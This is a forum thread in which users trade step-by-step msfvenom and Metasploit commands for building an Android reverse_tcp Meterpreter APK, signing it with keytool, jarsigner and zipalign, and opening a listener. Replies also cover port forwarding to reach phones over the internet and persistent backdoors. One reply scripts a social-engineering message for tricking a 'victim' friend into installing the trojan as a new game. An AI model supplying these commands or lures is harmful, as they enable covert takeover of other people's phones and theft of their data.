Forum Thread: Create and Use Android/Meterpreter/reverse_tcp APK with Msfvenom?

Create and Use Android/Meterpreter/reverse_tcp APK with Msfvenom?

Hi, Metasploit was updated recently (or, at least, since the last time I used it), and one large thing, is msfpayload was removed, and replaced with msfvenom. I used to be able to just do msfpayload android/meterpreter/reverse_tcp LHOST=ip R > /root/name.apk

Which would create the APK, and then
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST ip
exploit
To start listening, and it always worked, once the APK was executed on the android device (always my device, btw)

Now, I've tried substituting msfvenom -p for msfpayload, and it creates the APK, but when it is run and the listener is started, it does not connect.

Does anyone know what I'm doing wrong? I can't seem to figure out this new method of things...
Thanks!

67 Responses

Can you give us screenshots and the full command, please?

This is the command used to create the APK, which outputs a "hack.apk" in my root folder:

And this is the command used to start the listener (which used to result in my having control over the Android device, prior to the msfvenom update):

(I blurred names and IP's)
Also, if it makes any difference, I'm running Kali Linux.
And yes, it was intentional :)

Dude...it's super simple.
First create a payload :
root@kali :~# msfvenom -p android/meterpreter/reverse_tcp LHOST=(your ip) LPORT=5555 R > filename.apk

Now, email this file to the victim, but before you do that:

root@kali :~ # msfconsole
root@kali :~ # use multi/handler
root@kali :~ # set PAYLOAD android/meterpreter/reverse_tcp
root@kali :~ #set LHOST (your ip)
root@kali :~ # set LPORT 5555
root@kali :~ # exploit

Now, wait for the victim to download the file and then install it on his/her phone. Use social engineering to achieve this. Say for example : "Hey, dude I just made a new game. Unfortunately I don't have anyone to try it out for me and give a review. So, will you help me? Please. Thanks, man, I appericiate it." just an example!

Now the dumb "FRIEND" will install it and then open it and congrats : YOU GOT A METERPRETER SHELL on someone's phone. Now I'll leave u to ur imagination!

LOL!!! I died laughing when I saw that. I mean it's only his LAN so at least it isn't a bad slip up.

hi! in msfvenom command you missed lport!

Hi there!
The right syntax for msfvenom is:
msfvenom -p android/meterpreter/reversetcp LHOST=yourip -o /testdir/test.apk_

i done these steps ,after created the app i try to install but its showing pharse error what i do pls tell me ......

After generating the payload sign the .apk with d2j-apk-sign (name of your apk file) Now you have signed your apk file .Send it to the Victim

It says invalid payload :- andriod/meterpreter/reversetcp
What should i do ....?

reverse_tcp

same error " invalid payload" though the syntax is correct have checked it many times.what should i do next?

check spelling

May be a obvious question (beginner here), but how do you figure out what lport number to use?

This worked perfect for me :
terminal : msfvenom -p android/meterpreter/reverse_tcp LHOST= {YOUR IP} LPORT=4444 R > /root/whatever.apk
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost {your Ip}
set lport 4444
exploit

Once the victim tries to run it in his device. You'll get a meterpreter session.

Thanks Man,
I Just Forgot About This Line "set payload android/meterpreter/reverse_tcp"
Thank You A Lot :)

I did everything but when i try to install apk file in my oen android device to check its says application not installed! Please can amyone tell me how to fix this error thank you!

sorry i build paylaod but I can't install it THE error when i install it
application not installed

Check out my video for this tutorial!

One question.
The process worked perfectly for me.

But when you restart the computer,could you again connect to
victim phone and how?

I tried again as well as the first time but nothing:

use exploit/multi/handler
set payload android/meterpreter/reversetcp
set lhost {Ip}
set lport 4444
exploit

If anyone knows the answer how can we connect again on our "infected" phone ore we need to re-send the file?
Please help.

Thanks.

actually after you exploited ur victim for first time .. then and there create a persistent backdoor that would allow you access all the time .. regardless of system rebooting

And how can i create that persistent backdoor ? armitage ?

Hi guys, everything worked perfectly for me but when I sent the APK file to my phone it could not be install it shows ( parsing error ) because the backdoor file size was "0" I don't know why anyone can help please !

u have some syntax error in making the APK file,

msfvenom -p android/meterpreter/reversetcp LHOST=" ur IP" LPORT=" the port u want to listen on it" R > /PATH/TO/file.APK

there is an underscore >>> <<< between reverse and tcp

Hi Guys greetings, you know the cause of this problem when you start the exploit, I have been using in my Androdi 5.0 but always throws me the same fault

Meterpreter session 1 closed. Reason: Died

i can't install the app i created in my phone iwhat i should do ?

when i heck in lan i have no prob

but out lan i get this

Meterpreter session 1 closed. Reason: Died

You also can download the "One Click APK Signer" ()

Then drag and drop your Payload.apk on the on the one click signer cmd and it creates a signed Payload.apk that you can install on your victim Android!

Peace

i used LPORT=4444 and by online tool i checked and came to know that port 4444 is not open what is problem can anybody tell me.... port 80 is opened and i have tried by making virtual server and port forwarding but nothing worked..... can anybody resolve this port problem?? can i use port 80 for exploiting>>>???

thats because windows firewall blocks the same... add an exception or disable firewall temporarily...

use port 443 or 6666

If the app is uninstalled we can't get access to the victim's mobile...so is there any other way like if it is once installed it can't be removed or running in background script without the use of app

how should i use it for publi ip...it is not working for public up...i cannot bind with public ip

I tried first tep using following comman in linux kali

msfvenom -p android/meterpreter/reversetcp LHOST=172.16.1.79 LPORT=4444 R > /root/Upgrader.apk

here is the command with the response can someone explain?

msfvenom -p android/meterpreter/reversetcp LHOST=172.16.1.79 LPORT=4444 R > /root/Upgrader.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8824 bytes

hey i got this error message did you patch this issue
can you help me

its right continue next step

i dont have rooted phone ..
is this support new smartphone i try this but not working on my android phone can you help me ..
how to hack normal android phone like unrooted mobiles
can you help me im just a beginner

msfvenom --platform Android -p android/meterpreter/reversetcp LHOST=192.168.x.x R > /root/Upgrader.apk
This command removes first Platform error, do it for others(mean add options for Arch & Encoders too.)
But in my case i successfully achieved my target. wihtout implementing arch and ecoders options. (Good Luck)

hey guys,

i created the payload file on VMware and im trying to copy it onto my host OS which is windows. but it isnt happening. the error states that the file doesnt belong to the location any longer. what do i do?

thank you

hey guys,
this is the output i'm getting when i type exploit. what should i do so that this changes

As soon as the Target Executes your Payload the rest will happen.

my exploit stays at this state even when i excecute apk on my phone

For starters guys, anyone who does this needs to learn to troubleshoot their scripts.
All but one person (RAIN RAIN) noticed the "--platform" module missing.

When it spits out an error read what it says, then check the help file (usually "-h" or "--help") to see what options are relevant. Then if all else fails, try google ;)

Try LPORT=8080. That's ONLY port that works for me.

msfvenom -p android/meterpreter/reversetcp LHOST=yourip LPORT=8080 > /root/Desktop/anything.apk

New terminal:

msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST your_ip
set LPORT 8080

Hey, I could really use some help here...

this is the response that i get after typing the command and follows is either super weird or something super dumb on my part, but im sure one of you smart lads will crack it.. and no, that's not the ip address that i typed.

@Alva-Vostro-3546:~# msfvenom -p android/meterpreter/reversetcp lhost=X.X.X.X lport=4444 R > /root/mmupgrade.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9485 bytes_

Try to replace reversetcp with reverse_tcp

when i gave '' use exploit/multi/handler'' its showing command not found ...what is reason ....guys help me

hi ..!
i'm new here i show your video it's very helpful & i like to know more informations please help me.
when i try i always get like this what can i do...?

I installed apk on my phone, but when i click the apk nothing happens. I do not get into meterpreter, instead there is a button named ReverseTCP inside the apk which i tried to click but didnt got the connection. I am attaching screenshot of the same. please tell me where i am going wrong.

Open a terminal and type "route -n". Now, look under where it says "Gateway". Open your browser. In the address-bar, enter the number from the terminal. You should either be presented with a login-screen or have a page with router/modem/wlan settings load up. You're going to have to find out the credentials needed if you don't know them in order to get into your settings. Once you're in, navigate to an area having to do with "ip/port-forwarding". Look back at how you generated your payload and the information you inputted into it. You're going to have to enter the port and your machine's local IP into the settings, and save it. After this, you should be able to bind the port and IP address and stop experiencing issues. Also, before doing any of this, it may be a good idea to run these commands: "sudo apt-get update", "sudo apt-get dist-upgrade", "msfupdate", and "reboot".

Hi i'm new to the forum and to this kali linux thing.I entered the msfvenom -p android/meterpreter/reverse_tcp LHOST= {YOUR IP} LPORT=4444 R > /root/whatever.apk and it works but then i try to enter msfconsole and i get this.What can be done about this?

try running these commands
sudo apt-get update
sudo apt-get dist-upgrade
msfupdate
sudo apt autoremove
reboot
After your machine comes back up, run the first three commands again.

Then, try to enter msfconsole. I'm not sure what to tell you if the problem persists. All I can see is that the machine is misinterpreting the source-script, which appears to be in Ruby. If the problem persists... tbh I'd just reinstall Kali and be sure to get the network mirrors correct, along with all of the updates, etc. Also, be sure that the document "/etc/apt/sources.list" is correct.

Open a terminal and type "route -n". Now, look under where it says "Gateway". Open your browser. In the address-bar, enter the number from the terminal. You should either be presented with a login-screen or have a page with router/modem/wlan settings load up. You're going to have to find out the credentials needed if you don't know them in order to get into your settings. Once you're in, navigate to an area having to do with "ip/port-forwarding". Look back at how you generated your payload and the information you inputted into it. You're going to have to enter the port and your machine's local IP into the settings, and save it. After this, you should be able to bind the port and IP address and stop experiencing issues. Also, before doing any of this, it may be a good idea to run these commands: "sudo apt-get update", "sudo apt-get dist-upgrade", "msfupdate", and "reboot".

sudo apt-get update
sudo apt-get dist-upgrade
msfupdate
sudo apt autoremove
(follow the instructions from my last post)
route -n
ifconfig
msfconsole
msfvenom -p android/meterpreter/reversetcp LHOST=(PublicIP) LPORT=443 -o ~/Desktop/exampleTroj.apk
(note the difference between Public_IP and your local(IPv4) address).
(Be sure to have correctly followed the instructions from my last post).
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost (IPv4 Addr)
set lport 443
(Transport the trojan to the phone).
exploit
(wait about 5 seconds and then open the apk on the phone. You should see a session open).

Jason seem like your good at that can you maybe help me out
I want to make a payload for android that works over WAN

that what i do
Msfvenom –p android/meterpreter/reverse_tcp LHOST=181.114.103.5 (public ip) LPORT=2213 R > /root/Desktop/vm.apk
I signed the payload with SignApk jar
PORT FOWARDED the ip I found in my kali network settings: 192.168.10.129:2213
Msfconsole
Use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.10.129
set LPORT 2213
Exploit

Everything connect correctly

But then I install the app on my phone and run it but nothing happens, so which ip should i use for the payload:
handler:
port forward:

Hi, I try to hack a android device but cant get meterpreter session. apk file is succesfully installed on device with name of "Main Activity". Nothing happened, when i open the installed app, cant get any session. I tried many other android devices but facing same problem But when i tried on BLUESTACK (installed in my laptop) i get meterpreter session. WHY I DIDN'T GET SESSION ON ANDROID DEVICE ????? Please Help...*

Step 1: DIDN'T GET METERPRETER SESSION ON ANDROID DEVICE

Hi, I try to hack a android device but cant get meterpreter session. apk file is succesfully installed on device with name of "Main Activity". Nothing happened, when i open the installed app, cant get any session. I tried many other android devices but facing same problem But when i tried on BLUESTACK (installed in my laptop) i get meterpreter session. WHY I DIDN'T GET SESSION ON ANDROID DEVICE ????? Please Help...*

Device name: Mi Phone
Model Number: Mi 4i
Android version: 5.0.2 LRX22G

root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.255.144 LPORT=9986 R > test.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8789 bytes

root@kali:~# keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

Enter keystore password:
Re-enter new password:
What is your first and last name?
Unknown: a
What is the name of your organizational unit?
Unknown: b
What is the name of your organization?
Unknown: c
What is the name of your City or Locality?
Unknown: d
What is the name of your State or Province?
Unknown: e
What is the two-letter country code for this unit?
Unknown: f
Is CN=a, OU=b, O=c, L=d, ST=e, C=f correct?
no: yes

Generating 2,048 bit RSA key pair and self-signed certificate (SHA256withRSA) with a validity of 10,000 days
for: CN=a, OU=b, O=c, L=d, ST=e, C=f
Enter key password for <alias_name>
(RETURN if same as keystore password):
Storing my-release-key.keystore

root@kali:~# jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore test.apk alias_name

Enter Passphrase for keystore:
adding: META-INF/ALIAS_NA.SF
adding: META-INF/ALIAS_NA.RSA
signing: AndroidManifest.xml
signing: resources.arsc
signing: classes.dex
jar signed.

Warning:

No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-11-28) or after any future revocation date.

root@kali:~# jarsigner -verify -verbose -certs test.apk

s 258 Thu Jul 13 07:36:12 EDT 2017 META-INF/MANIFEST.MF

X.509, CN=a, OU=b, O=c, L=d, ST=e, C=f
certificate is valid from 7/13/17 7:41 AM to 11/28/44 6:41 AM
CertPath not validated: Path does not chain with any of the trust anchors

X.509, CN=Android Debug, O=Android, C=US
certificate is valid from 8/29/15 3:57 AM to 8/24/35 3:57 AM
CertPath not validated: Path does not chain with any of the trust anchors

393 Thu Jul 13 07:44:26 EDT 2017 META-INF/ALIAS_NA.SF
1254 Thu Jul 13 07:44:26 EDT 2017 META-INF/ALIAS_NA.RSA
272 Thu Jul 13 07:36:12 EDT 2017 META-INF/SIGNFILE.SF
1917 Thu Jul 13 07:36:12 EDT 2017 META-INF/SIGNFILE.RSA
0 Thu Jul 13 07:36:12 EDT 2017 META-INF/
sm 6992 Thu Jul 13 07:36:12 EDT 2017 AndroidManifest.xml

X.509, CN=a, OU=b, O=c, L=d, ST=e, C=f
certificate is valid from 7/13/17 7:41 AM to 11/28/44 6:41 AM
CertPath not validated: Path does not chain with any of the trust anchors

X.509, CN=Android Debug, O=Android, C=US
certificate is valid from 8/29/15 3:57 AM to 8/24/35 3:57 AM
CertPath not validated: Path does not chain with any of the trust anchors

sm 572 Thu Jul 13 07:36:12 EDT 2017 resources.arsc

X.509, CN=a, OU=b, O=c, L=d, ST=e, C=f
certificate is valid from 7/13/17 7:41 AM to 11/28/44 6:41 AM
CertPath not validated: Path does not chain with any of the trust anchors

X.509, CN=Android Debug, O=Android, C=US
certificate is valid from 8/29/15 3:57 AM to 8/24/35 3:57 AM
CertPath not validated: Path does not chain with any of the trust anchors

sm 17460 Thu Jul 13 07:36:12 EDT 2017 classes.dex

X.509, CN=a, OU=b, O=c, L=d, ST=e, C=f
certificate is valid from 7/13/17 7:41 AM to 11/28/44 6:41 AM
CertPath not validated: Path does not chain with any of the trust anchors

X.509, CN=Android Debug, O=Android, C=US
certificate is valid from 8/29/15 3:57 AM to 8/24/35 3:57 AM
CertPath not validated: Path does not chain with any of the trust anchors

s = signature was verified
m = entry is listed in manifest
k = at least one certificate was found in keystore
i = at least one certificate was found in identity scope

  • Signed by "CN=a, OU=b, O=c, L=d, ST=e, C=f"

Digest algorithm: SHA1
Signature algorithm: SHA1withRSA, 2048-bit key

  • Unparsable signature-related file META-INF/SIGNFILE.SF

jar verified.

Warning:
This jar contains entries whose certificate chain is not validated.

This jar contains signatures that does not include a timestamp. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2035-08-24) or after any future revocation date.

root@kali:~# zipalign -v 4 /root/test.apk /root/Desktop/test.apk
Verifying alignment of /root/Desktop/test.apk (4)...
50 META-INF/MANIFEST.MF (OK - compressed)
293 META-INF/ALIAS_NA.SF (OK - compressed)
639 META-INF/ALIAS_NA.RSA (OK - compressed)
1748 META-INF/ (OK)
1798 META-INF/SIGNFILE.SF (OK - compressed)
2079 META-INF/SIGNFILE.RSA (OK - compressed)
3167 AndroidManifest.xml (OK - compressed)
4934 resources.arsc (OK - compressed)
5164 classes.dex (OK - compressed)
Verification successful

root@kali:~# msfconsole

msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.255.144
LHOST => 192.168.255.144
msf exploit(handler) > set LPORT 9986
LPORT => 9986
msf exploit(handler) > exploit

* Started reverse TCP handler on 192.168.255.144:9986
* Starting the payload handler...

i am getting this error..is that something suppose to do with REX??.. how to fix this??

Share Your Thoughts

  • Hot
  • Active